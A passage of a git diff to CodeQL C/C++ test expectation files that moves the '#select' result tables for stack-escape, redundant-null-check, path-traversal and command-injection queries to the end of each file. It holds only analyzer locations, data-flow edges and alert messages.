| b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | +| test.cpp:165:16:165:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:165:16:165:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | +| test.cpp:166:17:166:18 | Load: p2 | test.cpp:140:3:140:16 | Store: ... = ... | test.cpp:166:17:166:18 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:140:3:140:16 | Store: ... = ... | this store | +| test.cpp:167:16:167:17 | Load: p1 | test.cpp:141:3:141:15 | Store: ... = ... | test.cpp:167:16:167:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:141:3:141:15 | Store: ... = ... | this store | +| test.cpp:168:17:168:18 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:168:17:168:18 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | +| test.cpp:170:16:170:17 | Load: p3 | test.cpp:144:3:144:12 | Store: ... = ... | test.cpp:170:16:170:17 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:144:3:144:12 | Store: ... = ... | this store | +| test.cpp:171:17:171:18 | Load: p3 | test.cpp:145:3:145:16 | Store: ... = ... | test.cpp:171:17:171:18 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:145:3:145:16 | Store: ... = ... | this store | +| test.cpp:172:18:172:19 | Load: p2 | test.cpp:146:3:146:15 | Store: ... = ... | test.cpp:172:18:172:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:146:3:146:15 | Store: ... = ... | this store | +| test.cpp:173:18:173:19 | Load: p2 | test.cpp:147:3:147:19 | Store: ... = ... | test.cpp:173:18:173:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:147:3:147:19 | Store: ... = ... | this store | +| test.cpp:174:18:174:19 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:174:18:174:19 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | +| test.cpp:175:16:175:17 | Load: p1 | test.cpp:148:3:148:18 | Store: ... = ... | test.cpp:175:16:175:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:148:3:148:18 | Store: ... = ... | this store | +| test.cpp:177:14:177:21 | Load: access to array | test.cpp:151:3:151:15 | Store: ... = ... | test.cpp:177:14:177:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:151:3:151:15 | Store: ... = ... | this store | +| test.cpp:178:14:178:21 | Load: access to array | test.cpp:152:3:152:19 | Store: ... = ... | test.cpp:178:14:178:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:152:3:152:19 | Store: ... = ... | this store | +| test.cpp:179:14:179:21 | Load: access to array | test.cpp:153:3:153:18 | Store: ... = ... | test.cpp:179:14:179:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:153:3:153:18 | Store: ... = ... | this store | +| test.cpp:180:14:180:19 | Load: * ... | test.cpp:154:3:154:22 | Store: ... = ... | test.cpp:180:14:180:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:154:3:154:22 | Store: ... = ... | this store | +| test.cpp:181:13:181:20 | Load: access to array | test.cpp:155:3:155:21 | Store: ... = ... | test.cpp:181:13:181:20 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:155:3:155:21 | Store: ... = ... | this store | +| test.cpp:182:14:182:19 | Load: * ... | test.cpp:156:3:156:25 | Store: ... = ... | test.cpp:182:14:182:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:156:3:156:25 | Store: ... = ... | this store | +| test.cpp:239:17:239:17 | Load: p | test.cpp:234:3:234:13 | Store: ... = ... | test.cpp:239:17:239:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:232:7:232:7 | x | x | test.cpp:234:3:234:13 | Store: ... = ... | this store | +| test.cpp:268:17:268:17 | Load: p | test.cpp:263:3:263:13 | Store: ... = ... | test.cpp:268:17:268:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:260:7:260:7 | x | x | test.cpp:263:3:263:13 | Store: ... = ... | this store | diff --git a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected index 997de4af41fd..8ffb2330840e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected @@ -1,21 +1,3 @@ -#select -| RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | the value is dereferenced | -edges -| RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | -| RedundantNullCheckSimple.cpp:3:8:3:8 | Load: p | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | -| RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | -| RedundantNullCheckSimple.cpp:10:12:10:12 | Load: p | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | -| RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | -| RedundantNullCheckSimple.cpp:19:8:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | -| RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | -| RedundantNullCheckSimple.cpp:78:8:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | -| RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | -| RedundantNullCheckSimple.cpp:92:18:92:18 | Load: p | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | nodes | RedundantNullCheckSimple.cpp:3:3:3:3 | VariableAddress: x | semmle.label | x | | RedundantNullCheckSimple.cpp:3:3:3:8 | Store: ... = ... | semmle.label | ... = ... | @@ -54,3 +36,21 @@ nodes | RedundantNullCheckSimple.cpp:93:9:93:10 | VariableAddress: sp | semmle.label | sp | | RedundantNullCheckSimple.cpp:93:13:93:13 | FieldAddress: p | semmle.label | p | | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | semmle.label | p | +edges +| RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | +| RedundantNullCheckSimple.cpp:3:8:3:8 | Load: p | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | +| RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | +| RedundantNullCheckSimple.cpp:10:12:10:12 | Load: p | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | +| RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | +| RedundantNullCheckSimple.cpp:19:8:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | +| RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | +| RedundantNullCheckSimple.cpp:78:8:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | +| RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | +| RedundantNullCheckSimple.cpp:92:18:92:18 | Load: p | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | +#select +| RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | the value is dereferenced | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected index 8ebb959ae4b5..031804b92251 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected @@ -1,5 +1,3 @@ -#select -| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | data | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | This argument to a file access function is derived from $@ and then passed to fopen(filename). | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | user input (string read by fgets) | edges | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:62:25:62:46 | ... = ... | provenance | | | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:69:21:69:40 | ... = ... | provenance | | @@ -12,3 +10,5 @@ nodes | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:69:21:69:40 | ... = ... | semmle.label | ... = ... | | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | semmle.label | *data | subpaths +#select +| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | data | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | This argument to a file access function is derived from $@ and then passed to fopen(filename). | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | user input (string read by fgets) | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected index 784928db0533..bb1caa71e120 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected @@ -1,5 +1,3 @@ -#select -| tests.cpp:53:16:53:19 | data | tests.cpp:33:34:33:39 | *call to getenv | tests.cpp:53:16:53:19 | *data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | tests.cpp:33:34:33:39 | *call to getenv | user input (an environment variable) | tests.cpp:38:25:38:36 | strncat output argument | strncat output argument | edges | tests.cpp:26:15:26:23 | **badSource | tests.cpp:51:12:51:20 | *call to badSource | provenance | | | tests.cpp:33:34:33:39 | *call to getenv | tests.cpp:33:34:33:39 | *call to getenv | provenance | | @@ -20,3 +18,5 @@ nodes | tests.cpp:51:12:51:20 | *call to badSource | semmle.label | *call to badSource | | tests.cpp:53:16:53:19 | *data | semmle.label | *data | subpaths +#select +| tests.cpp:53:16:53:19 | data | tests.cpp:33:34:33:39 | *call to getenv | tests.cpp:53:16:53:19 | *data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | tests.cpp:33:34:33:39 | *call to getenv | user input (an environment variable) | tests.cpp:38:25:38:36 | strncat output argument | strncat output argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected index 24f63e6cfaa5..18dd45752ccb 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected @@ -1,28 +1,3 @@ -#select -| test.cpp:23:12:23:19 | command1 | test.cpp:15:27:15:30 | **argv | test.cpp:23:12:23:19 | *command1 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:15:27:15:30 | **argv | user input (a command-line argument) | test.cpp:22:13:22:20 | sprintf output argument | sprintf output argument | -| test.cpp:51:10:51:16 | command | test.cpp:47:21:47:26 | *call to getenv | test.cpp:51:10:51:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:47:21:47:26 | *call to getenv | user input (an environment variable) | test.cpp:50:11:50:17 | sprintf output argument | sprintf output argument | -| test.cpp:66:10:66:16 | command | test.cpp:63:9:63:16 | fread output argument | test.cpp:66:10:66:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:63:9:63:16 | fread output argument | user input (string read by fread) | test.cpp:65:11:65:17 | strncat output argument | strncat output argument | -| test.cpp:86:32:86:38 | command | test.cpp:83:9:83:16 | fread output argument | test.cpp:86:32:86:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:83:9:83:16 | fread output argument | user input (string read by fread) | test.cpp:85:11:85:17 | strncat output argument | strncat output argument | -| test.cpp:95:45:95:48 | path | test.cpp:92:9:92:16 | fread output argument | test.cpp:95:45:95:48 | *path | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:92:9:92:16 | fread output argument | user input (string read by fread) | test.cpp:94:11:94:14 | strncat output argument | strncat output argument | -| test.cpp:109:18:109:22 | call to c_str | test.cpp:107:20:107:38 | *call to getenv | test.cpp:109:18:109:22 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:107:20:107:38 | *call to getenv | user input (an environment variable) | test.cpp:108:31:108:31 | call to operator+ | call to operator+ | -| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:10:115:23 | call to operator+ | call to operator+ | -| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:17:115:17 | call to operator+ | call to operator+ | -| test.cpp:121:25:121:28 | call to data | test.cpp:120:20:120:38 | *call to getenv | test.cpp:121:10:121:30 | *call to data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:120:20:120:38 | *call to getenv | user input (an environment variable) | test.cpp:121:17:121:17 | call to operator+ | call to operator+ | -| test.cpp:144:10:144:16 | command | test.cpp:141:9:141:11 | fread output argument | test.cpp:144:10:144:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:141:9:141:11 | fread output argument | user input (string read by fread) | test.cpp:143:11:143:17 | sprintf output argument | sprintf output argument | -| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:178:13:178:17 | strncat output argument | strncat output argument | -| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:179:13:179:19 | strncat output argument | strncat output argument | -| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:181:13:181:19 | strncat output argument | strncat output argument | -| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:188:11:188:15 | strncat output argument | strncat output argument | -| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:189:11:189:17 | strncat output argument | strncat output argument | -| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | -| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | -| test.cpp:234:10:234:15 | buffer | test.cpp:231:19:231:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:231:19:231:33 | *call to getenv | user input (an environment variable) | test.cpp:231:11:231:16 | strncat output argument | strncat output argument | -| test.cpp:234:10:234:15 | buffer | test.cpp:232:19:232:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:232:19:232:33 | *call to getenv | user input (an environment variable) | test.cpp:232:11:232:16 | strncat output argument | strncat output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:243:5:243:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:243:5:243:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:242:11:242:17 | sprintf output argument | sprintf output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:248:5:248:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:248:5:248:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | -| test.cpp:261:10:261:15 | buffer | test.cpp:259:21:259:35 | *call to getenv | test.cpp:261:10:261:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:259:21:259:35 | *call to getenv | user input (an environment variable) | test.cpp:259:13:259:18 | strncat output argument | strncat output argument | edges | test.cpp:15:27:15:30 | **argv | test.cpp:16:20:16:26 | *access to array | provenance | | | test.cpp:16:20:16:26 | *access to array | test.cpp:22:45:22:52 | *userName | provenance | | @@ -227,3 +202,28 @@ subpaths | test.cpp:197:26:197:33 | *filename | test.cpp:187:47:187:54 | *filename | test.cpp:187:19:187:25 | *command | test.cpp:197:10:197:16 | concat output argument | | test.cpp:197:26:197:33 | *filename | test.cpp:187:47:187:54 | *filename | test.cpp:187:19:187:25 | *command [Return] | test.cpp:197:10:197:16 | concat output argument | | test.cpp:197:26:197:33 | *filename | test.cpp:187:47:187:54 | *filename | test.cpp:187:19:187:25 | *command [Return] | test.cpp:197:10:197:16 | concat output argument | +#select +| test.cpp:23:12:23:19 | command1 | test.cpp:15:27:15:30 | **argv | test.cpp:23:12:23:19 | *command1 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:15:27:15:30 | **argv | user input (a command-line argument) | test.cpp:22:13:22:20 | sprintf output argument | sprintf output argument | +| test.cpp:51:10:51:16 | command | test.cpp:47:21:47:26 | *call to getenv | test.cpp:51:10:51:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:47:21:47:26 | *call to getenv | user input (an environment variable) | test.cpp:50:11:50:17 | sprintf output argument | sprintf output argument | +| test.cpp:66:10:66:16 | command | test.cpp:63:9:63:16 | fread output argument | test.cpp:66:10:66:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:63:9:63:16 | fread output argument | user input (string read by fread) | test.cpp:65:11:65:17 | strncat output argument | strncat output argument | +| test.cpp:86:32:86:38 | command | test.cpp:83:9:83:16 | fread output argument | test.cpp:86:32:86:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:83:9:83:16 | fread output argument | user input (string read by fread) | test.cpp:85:11:85:17 | strncat output argument | strncat output argument | +| test.cpp:95:45:95:48 | path | test.cpp:92:9:92:16 | fread output argument | test.cpp:95:45:95:48 | *path | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:92:9:92:16 | fread output argument | user input (string read by fread) | test.cpp:94:11:94:14 | strncat output argument | strncat output argument | +| test.cpp:109:18:109:22 | call to c_str | test.cpp:107:20:107:38 | *call to getenv | test.cpp:109:18:109:22 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:107:20:107:38 | *call to getenv | user input (an environment variable) | test.cpp:108:31:108:31 | call to operator+ | call to operator+ | +| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:10:115:23 | call to operator+ | call to operator+ | +| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:17:115:17 | call to operator+ | call to operator+ | +| test.cpp:121:25:121:28 | call to data | test.cpp:120:20:120:38 | *call to getenv | test.cpp:121:10:121:30 | *call to data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:120:20:120:38 | *call to getenv | user input (an environment variable) | test.cpp:121:17:121:17 | call to operator+ | call to operator+ | +| test.cpp:144:10:144:16 | command | test.cpp:141:9:141:11 | fread output argument | test.cpp:144:10:144:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:141:9:141:11 | fread output argument | user input (string read by fread) | test.cpp:143:11:143:17 | sprintf output argument | sprintf output argument | +| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:178:13:178:17 | strncat output argument | strncat output argument | +| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:179:13:179:19 | strncat output argument | strncat output argument | +| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:181:13:181:19 | strncat output argument | strncat output argument | +| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:188:11:188:15 | strncat output argument | strncat output argument | +| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:189:11:189:17 | strncat output argument | strncat output argument | +| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is 